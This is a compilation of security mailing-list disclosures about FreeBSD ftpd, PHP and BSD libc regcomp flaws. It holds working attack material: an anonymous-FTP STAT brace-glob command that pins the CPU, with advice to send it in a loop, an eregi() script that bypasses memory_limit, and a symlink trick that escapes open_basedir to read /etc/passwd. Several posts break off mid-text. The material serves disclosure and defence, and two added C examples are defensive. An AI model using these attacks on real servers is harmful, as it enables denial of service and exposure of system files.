Re: [Full-disclosure] Allegro.pl XSS [0-day]
XSS isn't a critical issue. CVSS2 defines a standard XSS as ~4.3/10; more critical are CSRF at ~6.8 or Open Redirect at ~5.8. It makes no sense to publish an XSS in ONE website on this list! Too many websites are vulnerable. If someone has a nice XSS in software like phpMyAdmin, it could be interesting.

-- Best regards,
Maksymilian Arciemowicz ( http://cifrex.org/ )

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Allegro.pl XSS [0-day]
It's not a 0day. Allegro is not a software vendor. It's a website.

-- Best regards,
Maksymilian Arciemowicz ( http://cvemap.org/ )
[Full-disclosure] FreeBSD 9.1 ftpd Remote Denial of Service
FreeBSD 9.1 ftpd Remote Denial of Service
Maksymilian Arciemowicz
http://cxsecurity.org/
http://cxsec.org/

Public Date: 01.02.2013
URL: http://cxsecurity.com/issue/WLB-2013020003

Affected servers:
- ftp.uk.freebsd.org,
- ftp.ua.freebsd.org,
- ftp5.freebsd.org,
- ftp5.us.freebsd.org,
- ftp10.freebsd.org,
- ftp3.uk.freebsd.org,
- ftp7.ua.freebsd.org,
- ftp2.se.freebsd.org,
- ftp2.za.FreeBSD.org,
- ftp2.ru.freebsd.org,
- ftp2.pl.freebsd.org
and more...

--- 1. Description ---
I have decided to check BSD ftpd servers once again for wildcards. An old bug in libc (CVE-2011-0418) allows a Denial of Service of ftpd in the latest FreeBSD version. An attacker who can connect anonymously to the FTP server may cause CPU resource exhaustion. Logging in with 'USER anonymous' 'PASS anonymous' and sending a 'STAT' command with a special wildcard is enough to create an ftpd process with 100% CPU usage.

Proof of Concept (PoC): See the difference between NetBSD/libc and FreeBSD/libc.

--- PoC ---
#include <stdio.h>
#include <glob.h>

int main(){
 glob_t globbuf;
 char stringa[]="{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}";
 glob(stringa,GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE|GLOB_LIMIT, NULL, &globbuf);
}
--- PoC ---

--- Exploit ---
user anonymous
pass anonymous
stat {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
--- /Exploit ---

Result of attack:
ftp   13034  0.0  0.4 10416 1944  ??  R    10:48PM   0:00.96 ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp   13035  0.0  0.4 10416 1944  ??  R    10:48PM   0:00.89 ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp   13036  0.0  0.4 10416 1944  ??  R    10:48PM   0:00.73 ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp   13046  0.0  0.4 10416 1952  ??  R    10:48PM   0:00.41 ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp   13047  0.0  0.4 10416 1960  ??  R    10:48PM   0:00.42 ftpd: cxsec.org anonymous/anonymous (ftpd)
...
root  13219  0.0  0.3 10032 1424  ??  R    10:52PM   0:00.00 /usr/libexec/ftpd -dDA
root  13225  0.0  0.3 10032 1428  ??  R    10:52PM   0:00.00 /usr/libexec/ftpd -dDA
root  13409  0.0  0.3 10032 1404  ??  R    10:53PM   0:00.00 /usr/libexec/ftpd -dDA
root  13410  0.0  0.3 10032 1404  ??  R    10:53PM   0:00.00 /usr/libexec/ftpd -dDA
...

=>Sending: STAT {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
=>Result:
@ps:
ftp    1336 100.0  0.5 10416 2360  ??  R    11:15PM 600:39.95 ftpd: 127.0.0.1: anonymous/anonym...@cxsecurity.com: \r\n (ftpd)$
@top:
 1336 root   1 103  0 10416K 2360K RUN  600:53 100.00% ftpd

One request: over 600 minutes (~10h) of execution time and 100% CPU usage.

This issue allows creating N ftpd processes with 100% CPU usage. Just create a while(1) loop and send these commands:
---
user anonymous
pass anonymous
stat {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
---

NetBSD and OpenBSD have fixed this issue in glob(3)/libc (2011):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c.diff?r1=1.24&r2=1.23.10.2

The funniest thing is that FreeBSD uses GLOB_LIMIT in the ftpd server.
http://www.freebsd.org/cgi/cvsweb.cgi/src/libexec/ftpd/ftpd.c
---
 if (strpbrk(whichf, "~{[*?") != NULL) {
  int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;

  memset(&gl, 0, sizeof(gl));
  gl.gl_matchc = MAXGLOBARGS;
  flags |= GLOB_LIMIT;
  freeglob = 1;
  if (glob(whichf, flags, 0, &gl)) {
---
but GLOB_LIMIT in FreeBSD doesn't work.
The glob(3) function allows CPU resource exhaustion. ;]

Libc was also vulnerable in Apple and Oracle products.
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
http://support.apple.com/kb/HT4723

Only FreeBSD and GNU glibc are affected.

--- 2. Exploit ---
http://cxsecurity.com/issue/WLB-2013010233

--- 3. Fix ---
Don't use ftpd on FreeBSD systems. :)
You may use vsftpd to resolve the security problem ;)

--- 4. References ---
Multiple Vendors libc/glob(3) remote ftpd resource exhaustion
http://cxsecurity.com/issue/WLB-2010100135
http:
[Full-disclosure] cIFrex: How to use Regular Expressions in Research
cIFrex is a small script written in PHP which supports searching for bugs during source code analysis. Using a database of filters based on regular expressions, you can quickly locate the code in which the probability of a failure is high. You will just need to have the source code on a computer with access to cIFrex in order to fully benefit from the possibilities of the new methodology.

Since 2010, cIFrex has been used in my private research. Creating new filters, I have discovered a lot of bugs like Resource Exhaustion in libc, apache or vsftpd. The problem with recursion was very easy to locate. In vsftpd and libc, the PoC contained the '*' char.

-fnmatch()/fnmatch.c--
 /* Collapse multiple stars. */
 while (c == '*')
-fnmatch()/fnmatch.c--

and

-vsf_filename_passes_filter()/ls.c--
 /* Any incoming string left means no match unless we ended on the correct
  * type of wildcard. */
 if (str_getlen(&name_remain_str) > 0 && last_token != '*')
-vsf_filename_passes_filter()/ls.c--

Many stars have been used in the demonstration PoCs for apache and vsftpd. According to intuition, where there is a '*' char there is also a recursion. Recursion in fnmatch() and vsf_filename_passes_filter() can be described by:

V1: (?:int |char |^)(?\w+)\(.*
T1: (?:if|while).*\(

To see all files where '*' was used, use the T2 pattern:

T2: .*\'\*\'.*

As a result, we retrieve a list of probably vulnerable files. But you need more luck and good intuition. Remember that cIFrex:
- only helps to search for the bugs
- the search results do not guarantee the appearance of the susceptibilities
- the more exact the regular expression, the larger the probability of the appearance of the susceptibilities

cIFrex may be used to catch bugs not only in the C language. Using a filter like:

V1: (.*echo.*\$_(?:POST|GET)\[(?:\'|\")(?\w+)(?:\'|\")\].*)
F1: htmlspecialchars.*
F2: \(int\)\$_(?:POST|GET)\[..\]

we may catch a lot of Cross Site Scripting (CWE-79) vulnerabilities. Or SQL Injection (CWE-89) using:

V1: \$(?\w+) \=.*\$_(?:GET|POST)\[(?.*)\]
T1: mysql_query\(.*\$
F1: addslashes.*\$

List of filters
cIFrex filters are based on regular expressions describing a given kind of mistake together with the CWE identifiers
http://cxsecurity.com/cifrex/filters/

Download
http://cxsecurity.com/cifrex/#download
Download the latest stable version of the code:
http://cxsecurity.com/cifrex_download/1.1/run.txt

CWE Dictionary
http://cxsecurity.com/allcwe/

CVE Full Map
http://cxsecurity.com/cvemap/

More about the project
http://cxsecurity.com/cifrex/
http://cxsecurity.com/

-- Best Regards
Maksymilian Arciemowicz (CXSecurity.com)
pub 4096R/D6E5B530 2010-09-19
uid Maksymilian Arciemowicz (cx)
sub 4096R/58BA663C 2010-09-19
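The V/F filter idea from the post, as a small added example in C (my code, not cIFrex itself, which is a PHP script). My reading of the filter semantics, which is an assumption: a line is a candidate when it matches the V (vulnerability) pattern and none of the F (false-positive) patterns; the T patterns are not modelled. The patterns are rewritten in POSIX ERE because regcomp(3) has no `\w` or `(?:...)`, and the sample PHP lines are constructed for the demonstration.

```c
/* Added example: a cIFrex-style V/F line filter on top of POSIX regcomp(3).
 * Not the cIFrex code; filter semantics (V must match, no F may match) are
 * my reading of the post. */
#include <regex.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_F 4

struct filter {
    const char *cwe;        /* label for the report, e.g. "CWE-79" */
    const char *v;          /* vulnerability pattern: must match */
    const char *f[MAX_F];   /* exclusion patterns: must not match; NULL-terminated */
};

struct compiled {
    regex_t v;
    regex_t f[MAX_F];
    int nf;
};

static int compile_filter(const struct filter *flt, struct compiled *out)
{
    if (regcomp(&out->v, flt->v, REG_EXTENDED | REG_NOSUB) != 0)
        return -1;
    out->nf = 0;
    for (int i = 0; i < MAX_F && flt->f[i] != NULL; i++) {
        if (regcomp(&out->f[out->nf], flt->f[i], REG_EXTENDED | REG_NOSUB) != 0)
            return -1;
        out->nf++;
    }
    return 0;
}

static void free_filter(struct compiled *c)
{
    regfree(&c->v);
    for (int i = 0; i < c->nf; i++)
        regfree(&c->f[i]);
}

/* 1 when V matches the line and no F pattern matches it. */
static int line_is_candidate(const struct compiled *c, const char *line)
{
    if (regexec(&c->v, line, 0, NULL, 0) != 0)
        return 0;
    for (int i = 0; i < c->nf; i++)
        if (regexec(&c->f[i], line, 0, NULL, 0) == 0)
            return 0;
    return 1;
}

/* Scans source lines, prints each candidate with its 1-based line number,
 * and returns the candidate count (-1 if a pattern failed to compile). */
int scan_lines(const struct filter *flt, const char *const *lines, int n)
{
    struct compiled c;
    int hits = 0;
    if (compile_filter(flt, &c) != 0)
        return -1;
    for (int i = 0; i < n; i++) {
        if (line_is_candidate(&c, lines[i])) {
            printf("%s candidate at line %d: %s\n", flt->cwe, i + 1, lines[i]);
            hits++;
        }
    }
    free_filter(&c);
    return hits;
}

/* ERE rendition of the XSS filter from the post: an echo of a raw
 * $_GET/$_POST element, excluding lines that pass through htmlspecialchars()
 * or cast the value to int. */
const struct filter XSS_FILTER = {
    "CWE-79",
    "echo.*\\$_(POST|GET)\\[('|\")[A-Za-z0-9_]+('|\")]",
    { "htmlspecialchars", "\\(int\\)\\$_(POST|GET)\\[", NULL }
};

/* Constructed sample input; not from any real project. */
const char *const SAMPLE_PHP[] = {
    "<?php",
    "echo $_GET['name'];",                      /* candidate */
    "echo htmlspecialchars($_GET['name']);",    /* excluded by F1 */
    "echo (int)$_POST['id'];",                  /* excluded by F2 */
    "$x = $_GET['q']; echo $x;",                /* V needs echo before $_GET[...]: no match */
    "echo \"hi \" . $_POST[\"user\"];",         /* candidate */
};
const int SAMPLE_PHP_LEN = sizeof SAMPLE_PHP / sizeof SAMPLE_PHP[0];

int scan_sample(void)
{
    return scan_lines(&XSS_FILTER, SAMPLE_PHP, SAMPLE_PHP_LEN);
}

int main(void)
{
    return scan_sample() >= 0 ? 0 : 1;
}
```

The fifth sample line shows the limit the post warns about: the indirect echo through `$x` is a real candidate that this V pattern cannot see, which is why a filter only narrows the search and the reviewer still has to read the code.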
[Full-disclosure] PHP 5.4/5.3 deprecated eregi() memory_limit bypass
[ PHP 5.4/5.3 deprecated eregi() memory_limit bypass ]

Author: Maksymilian Arciemowicz
Website: http://cxsecurity.com/
Date: 30.03.2012
Original link: http://cxsecurity.com/issue/WLB-2012030272

PoC's:
memory_limit poc http://cxsecurity.com/issue/WLB-2012030271
open_basedir poc http://cxsecurity.com/issue/WLB-2012030270

--- 1. PHP memory_limit bypass ---
Functions based on POSIX regular expressions, e.g. eregi(), have been deprecated since PHP 5.3. In the latest version, 5.4.0, we may still use these functions. This allows us to bypass memory_limit in PHP. The eregi() function is based on POSIX regexp, whereas preg_match() is based on PCRE. This is the main difference between these functions.

POSIX Regex Functions Tutorial
http://lu.php.net/manual/en/ref.regex.php

PCRE Functions Tutorial
http://lu.php.net/manual/en/ref.pcre.php

Last year we published a fix for the regcomp()/libc function from the NetBSD source. eregi() uses the same source code as the NetBSD libc. As a result, we may exhaust the memory limit or the stack in PHP.

See our security note:
Multiple BSD libc/regcomp(3) Multiple Vulnerabilities
http://cxsecurity.com/research/102

The script presented below shows how to use eregi() to exhaust memory in PHP.

<?php
/*
- http://cxsecurity.com/issue/WLB-2012030271
-- http://cxsecurity.com/
cxib [ a.T] cxsecurity [ d0t] com

To show memory_limit in PHP
# php /www/memlimpoc.php 1 3500
PHP Fatal error:  Allowed memory size of 33554432 bytes exhausted (tried to allocate 3501 bytes) in /var/www/memlimpoc.php on line 12
Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 3501 bytes) in /var/www/memlimpoc.php on line 12

and try this
# php /www/memlimpoc.php 2
memory_limit bypassed
*/
ini_set("memory_limit","32M");
if($argv[1]==1) $sss=str_repeat("A",$argv[2]);
elseif($argv[1]==2) eregi("(.?)(((.*){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}","a");
?>

- http://cxsecurity.com/issue/WLB-2012030271

Remember. Don't use memory_limit as the main memory limiter.

--- 2. PHP open_basedir bypass ---
The latest PHP version, 5.4.0, brought many changes. safe_mode has been removed but open_basedir is still available for use. We don't need to look for new ways to bypass open_basedir. The problem with symlinks is still present in PHP.

safe_mode tutorial
http://php.net/manual/en/features.safe-mode.php

PoC:
127# cat sym.php
127# php sym.php
PHP Warning:  symlink(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/www) in /www/test/sym.php on line 2
Warning: symlink(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/www) in /www/test/sym.php on line 2
127#

open_basedir will disallow /etc/passwd. Let's see:

127# ls -la
total 8
drwxr-xr-x   2 www  www   512 Oct 20 00:33 .
drwxr-xr-x  13 www  www  1536 Oct 20 00:26 ..
-rw-r--r--   1 www  www   356 Oct 20 00:32 kakao.php
-rw-r--r--   1 www  www    45 Oct 20 00:26 sym.php
127# pwd
/www/test
127# cat kakao.php
127# php kakao.php
127# ls -la
total 12
drwxr-xr-x   4 www  www   512 Oct 20 00:37 .
drwxr-xr-x  13 www  www  1536 Oct 20 00:26 ..
drwxr-xr-x   4 www  www   512 Oct 20 00:37 abc
lrwxr-xr-x   1 www  www    27 Oct 20 00:37 exploit -> tmplink/../../../etc/passwd
-rw-r--r--   1 www  www   356 Oct 20 00:32 kakao.php
-rw-r--r--   1 www  www    45 Oct 20 00:26 sym.php
drwxr-xr-x   2 www  www   512 Oct 20 00:37 tmplink
127# cat exploit
# passwd
#
root:*:0:0:god:/root:/bin/csh
...

Now "tmplink" is a directory, so the link "exploit" will be "../../etc/passwd". We don't need to bypass open_basedir; it is a design mistake. PHP will allow "tmplink/../../../etc/passwd" because ./tmplink/../../../etc/passwd really exists.

PoC: http://cxsecurity.com/issue/WLB-2012030270

Remember. Don't use open_basedir as the main security feature.

--- 3. References ---
Multiple BSD libc/regcomp(3) Multiple Vulnerabilities
http://cxsecurity.com/research/102
memory_limit bypass poc
http://cxsecurity.com/issue/WLB-2012030271
PHP 5.2.11/5.3.0 Multiple Vulnerabilities
http://cxsecurity.com/research/70
open_basedir bypass poc
http://cxs
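The design mistake described above is a check made once, against a path string, while the filesystem underneath it can change. An added example (my code, not PHP's) of the robust alternative: resolve the path with realpath(3) at the moment of access and test the resolved result for containment, so a symlink that is later swapped for a directory gets re-evaluated. The demo rebuilds the post's scenario in a scratch directory created with mkdtemp(3); the names `path_within_base` and `demo_retargeted_symlink` are mine, and the scratch file `secret` stands in for /etc/passwd.

```c
/* Added example: open_basedir-style containment done on the resolved path at
 * access time. Not PHP code. Assumes a POSIX system with realpath(3),
 * mkdtemp(3) and symlink(2), and a writable /tmp. */
#define _DEFAULT_SOURCE
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* 1 if `path` (symlinks and ".." resolved) lies inside `base`, 0 if it
 * escapes or does not exist, -1 if `base` itself cannot be resolved.
 * The separator test avoids the prefix bug where "/www" also "contains"
 * "/wwwroot". */
int path_within_base(const char *base, const char *path)
{
    char rbase[PATH_MAX], rpath[PATH_MAX];
    if (realpath(base, rbase) == NULL)
        return -1;
    if (realpath(path, rpath) == NULL)
        return 0;                               /* nonexistent: deny */
    size_t n = strlen(rbase);
    if (strncmp(rbase, rpath, n) != 0)
        return 0;
    return rpath[n] == '\0' || rpath[n] == '/' || (n == 1 && rbase[0] == '/');
}

static int touch(const char *p)
{
    FILE *f = fopen(p, "w");
    if (f == NULL) return -1;
    fclose(f);
    return 0;
}

/* Rebuilds the post's trick: base/tmplink first points at a deep directory,
 * so "base/tmplink/../../secret" resolves inside base; then tmplink becomes
 * a plain directory and the very same string resolves outside base.
 * Returns 1 if the check allowed the first and denied the second, -1 on
 * setup error. Everything it creates is removed again. */
int demo_retargeted_symlink(void)
{
    char root[] = "/tmp/basedir.XXXXXX";
    if (mkdtemp(root) == NULL)
        return -1;
    char base[PATH_MAX], a[PATH_MAX], b[PATH_MAX], link[PATH_MAX];
    char inside[PATH_MAX], outside[PATH_MAX], probe[PATH_MAX];
    snprintf(base, sizeof base, "%s/www", root);
    snprintf(a, sizeof a, "%s/www/a", root);
    snprintf(b, sizeof b, "%s/www/a/b", root);
    snprintf(link, sizeof link, "%s/www/tmplink", root);
    snprintf(inside, sizeof inside, "%s/www/secret", root);
    snprintf(outside, sizeof outside, "%s/secret", root);     /* the "/etc/passwd" stand-in */
    snprintf(probe, sizeof probe, "%s/www/tmplink/../../secret", root);

    if (mkdir(base, 0700) || mkdir(a, 0700) || mkdir(b, 0700) ||
        touch(inside) || touch(outside) || symlink("a/b", link))
        return -1;

    int first = path_within_base(base, probe);   /* tmplink -> a/b: www/a/b/../.. = www */
    unlink(link);
    mkdir(link, 0700);                            /* tmplink is now an empty directory */
    int second = path_within_base(base, probe);  /* www/tmplink/../.. = root: escapes */

    rmdir(link); unlink(inside); unlink(outside);
    rmdir(b); rmdir(a); rmdir(base); rmdir(root);
    return first == 1 && second == 0;
}

int main(void)
{
    return demo_retargeted_symlink() == 1 ? 0 : 1;
}
```

The point of the demo is the second call: the string that was approved a moment earlier now resolves to `root/secret`, and only a check on the resolved path at access time notices.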
[Full-disclosure] PHP 5.3.8 Multiple vulnerabilities
[ PHP 5.3.8 Multiple vulnerabilities ]

Author: Maksymilian Arciemowicz
Website: http://cxsecurity.com/
Date: 14.01.2012
CVE: CVE-2011-4153 (zend_strndup)
Original link: http://cxsecurity.com/research/103

[--- 1. Multiple NULL Pointer Dereference with zend_strndup() [CVE-2011-4153] ---]

As we can see in zend_strndup():

--zend_alloca.c---
ZEND_API char *zend_strndup(const char *s, uint length)
{
	char *p;

	p = (char *) malloc(length+1);
	if (UNEXPECTED(p == NULL)) {
		return p;   <=== RETURN NULL
	}
	if (length) {
		memcpy(p, s, length);
	}
	p[length] = 0;
	return p;
}
--zend_alloca.c---

zend_strndup() may return NULL; in the PHP code, many calls to zend_strndup() don't check the returned value. As a result, places like:

--zend_builtin_functions.c---
ZEND_FUNCTION(define)
{
	char *name;
	int name_len;
	zval *val;
	zval *val_free = NULL;
	zend_bool non_cs = 0;
	int case_sensitive = CONST_CS;
	zend_constant c;

	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sz|b", &name, &name_len, &val, &non_cs) == FAILURE) {
		return;
	}
	...
	c.flags = case_sensitive; /* non persistent */
	c.name = zend_strndup(name, name_len);   <=== MAY RETURN NULL
	c.name_len = name_len+1;
	c.module_number = PHP_USER_CONSTANT;
	if (zend_register_constant(&c TSRMLS_CC) == SUCCESS) {
		RETURN_TRUE;
	} else {
		RETURN_FALSE;
	}
}
--zend_builtin_functions.c---

--PoC code---
[cx@82 /www]$ ulimit -a
socket buffer size       (bytes, -b)  unlimited
core file size          (blocks, -c)  unlimited
data seg size           (kbytes, -d)  524288
file size               (blocks, -f)  unlimited
max locked memory       (kbytes, -l)  unlimited
max memory size         (kbytes, -m)  4
open files                      (-n)  11095
pipe size            (512 bytes, -p)  1
stack size              (kbytes, -s)  65536
cpu time               (seconds, -t)  unlimited
max user processes              (-u)  5547
virtual memory          (kbytes, -v)  4
swap size               (kbytes, -w)  unlimited
[cx@82 /www]$ cat define.php
--PoC code---

to see the difference

[cx@82 /www]$ php define.php 899
Out of memory
[cx@82 /www]$ php define.php 999
Segmentation fault: 11

(gdb) bt
#0  0x28745eb0 in strrchr () from /lib/libc.so.7
#1  0x0822d538 in zend_register_constant (c=0xbfbfcfb0) at /usr/ports/lang/php5/work/php/Zend/zend_constants.c:429
#2  0x08251e0e in zif_define (ht=2, return_value=0x28825a98, return_value_ptr=0x0, this_ptr=0x0, return_value_used=0) at /usr/ports/lang/php5/work/php/Zend/zend_builtin_functions.c:688
#3  0x0826dba6 in zend_do_fcall_common_helper_SPEC (execute_data=0x29401040) at zend_vm_execute.h:316

There are other places where zend_strndup() is used:

--1-- ext/soap/php_sdl.c
	if (sdl->is_persistent) {
		new_enc->details.ns = zend_strndup(ns, ns_len);
		new_enc->details.type_str = strdup(new_enc->details.type_str);
	} else {
		new_enc->details.ns = estrndup(ns, ns_len);
		new_enc->details.type_str = estrdup(new_enc->details.type_str);
	}
--1--

--2-- ext/standard/syslog.c
	BG(syslog_device) = zend_strndup(ident, ident_len);
	openlog(BG(syslog_device), option, facility);
	RETURN_TRUE;
--2--

--3-- ext/standard/browscap.c
	} else { /* Other than true/false setting */
		Z_STRVAL_P(new_property) = zend_strndup(Z_STRVAL_P(arg2), Z_STRLEN_P(arg2));
		Z_STRLEN_P(new_property) = Z_STRLEN_P(arg2);
	}
	new_key = zend_strndup(Z_STRVAL_P(arg1), Z_STRLEN_P(arg1));
	zend_str_tolower(new_key, Z_STRLEN_P(arg1));
	zend_hash_update(Z_ARRVAL_P(current_section), new_key, Z_STRLEN_P(arg1) + 1, &new_property, sizeof(zval *), NULL);
	free(new_key);
--3--

--4-- ext/oci8/oci8.c
	if (alloc_non_persistent) {
		connection = (php_oci_connection *) ecalloc(1, sizeof(php_oci_connection));
		connection->hash_key = estrndup(hashed_details.c, hashed_details.len);
		connection->is_persistent = 0;
	} else {
		connection = (php_oci_connection *) calloc(1, sizeof(php_oci_connection));
		connection->hash_key = zend_strndup(hashed_details.c, hashed_details.len);
[Full-disclosure] Multiple BSD libc/regcomp(3) Multiple Vulnerabilities
[ Multiple BSD libc/regcomp(3) Multiple Vulnerabilities ]

Author: Maksymilian Arciemowicz
http://www.netbsd.org/donations/
http://securityreason.com/
http://cxib.net/

Date:
- Dis.: 05.10.2011
- Pub.: 04.11.2011

CVE: CVE-2011-3336

Affected Software:
- NetBSD 5.1 (fixed)
- OpenBSD 5.0
- FreeBSD 8.2
- MacOSX

Original URL: http://securityreason.com/achievement_securityalert/102

--- 0. Description ---
regcomp() compiles the regular expression contained in the pattern string, subject to the flags in cflags, and places the results in the regex_t structure pointed to by preg. cflags is the bitwise OR of zero or more of the following flags:

REG_EXTENDED  Compile modern (extended) REs, rather than the obsolete (basic) REs that are the default.
REG_BASIC     This is a synonym for 0, provided as a counterpart to REG_EXTENDED to improve readability.

--- 1. Multiple BSD libc/regcomp(3) Multiple Vulnerabilities ---
In the BSD implementation of regcomp(3), I've discovered several flaws. A similar problem was diagnosed one year ago in GNU libc (01.10.2010), but the GNU regcomp() code is different from BSD's. Recursion and bad memory management may lead to an unexpected end of the application. Together with NetBSD we have decided to fix all these flaws. Most important was a limit on recursion for REG_EXTENDED and REG_BASIC, and getting better control over memory usage.

A specifically crafted .ftpaccess file can return a result as below:

--proftpd---
# telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 ProFTPD 1.3.3f Server (ProFTPD Default Installation) [127.0.0.1]
user dude
331 Password required for dude
pass dude

and at the same time

# gdb -q proftpd 15814
(no debugging symbols found)
Attaching to program: /usr/local/sbin/proftpd, process 15814
Reading symbols from /usr/lib/libutil.so.11.2...done.
Loaded symbols for /usr/lib/libutil.so.11.2
Reading symbols from /usr/lib/libc.so.58.0...done.
Loaded symbols for /usr/lib/libc.so.58.0
Reading symbols from /usr/libexec/ld.so...done.
Loaded symbols for /usr/libexec/ld.so
0x001f39e9 in select () from /usr/lib/libc.so.58.0
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x0026d951 in memcpy () from /usr/lib/libc.so.58.0

crash in regcomp()
...
	assert(finish >= start);
	if (len == 0)
		return(ret);
	enlarge(p, p->ssize + len);	/* this many unexpected additions */
	assert(p->ssize >= p->slen + len);
	(void)memcpy(p->strip + p->slen, p->strip + start, (size_t)len * sizeof(sop));
...
(gdb) x/i $eip
0x2d42951 :	repz movsl %ds:(%esi),%es:(%edi)
...
--proftpd---

Uncontrolled memory exhaustion allows creating an RE consuming all free memory. As we can read in the manual:

--man regcomp 3--
regexec() performance is poor. This will improve with later releases. nmatch exceeding 0 is expensive; nmatch exceeding 1 is worse. regexec is largely insensitive to RE complexity except that back references are massively expensive. RE length does matter; in particular, there is a strong speed bonus for keeping RE length under about 30 characters, with most special characters counting roughly double.

regcomp() implements bounded repetitions by macro expansion, which is costly in time and space if counts are large or bounded repetitions are nested. An RE like, say, `a{1,100}){1,100}){1,100}){1,100}){1,100}' will (eventually) run almost any existing machine out of swap space.
--man regcomp 3--

Using an RE like `a{1,100}){1,100}){1,100}){1,100}){1,100}' may lead to out of swap space. It can be helpful to attack the last stable version of proftpd.

To fix the memory exhaustion problem, we should create some limit on memory usage. In my opinion 128MB is an optimal limit for one regcomp(3) call. Then a function checking memory usage like below

--part-of-fix--
214: #define MEMLIMIT 0x800
215: #define MEMSIZE(p) \
216: 	((p)->ncsalloc / CHAR_BIT * (p)->g->csetsize + \
217: 	 (p)->ncsalloc * sizeof(cset) + \
218: 	 (p)->ssize * sizeof(sop))
219: #define RECLIMIT 256
--part-of-fix--

should solve the problem with memory exhaustion.

In regcomp() we have a few recursion loops:
- p_ere <> p_ere_exp
- p_bre <> p_bre_exp
- repeat

We need to create a limit for the two main functions p_ere and p_bre_exp

#define RECLIMIT 256

--REG_EXTENDED---
341: p_ere(
342: 	struct parse *p,
343: 	int stop,			/* character this ERE should end at */
344: 	size_t reclimit)
345: {
...
351:
352: 	_DIAGASSERT(p != NULL);
353:
354: 	if (reclimit++ > RECLIMIT || p->error == REG_ESPACE) {
355: 		p->error = REG_ESPACE;
356: 		return;
357: 	}
358:
359: 	for (;;) {
360: 		/* do a bunch of concatenated expressions */
361:
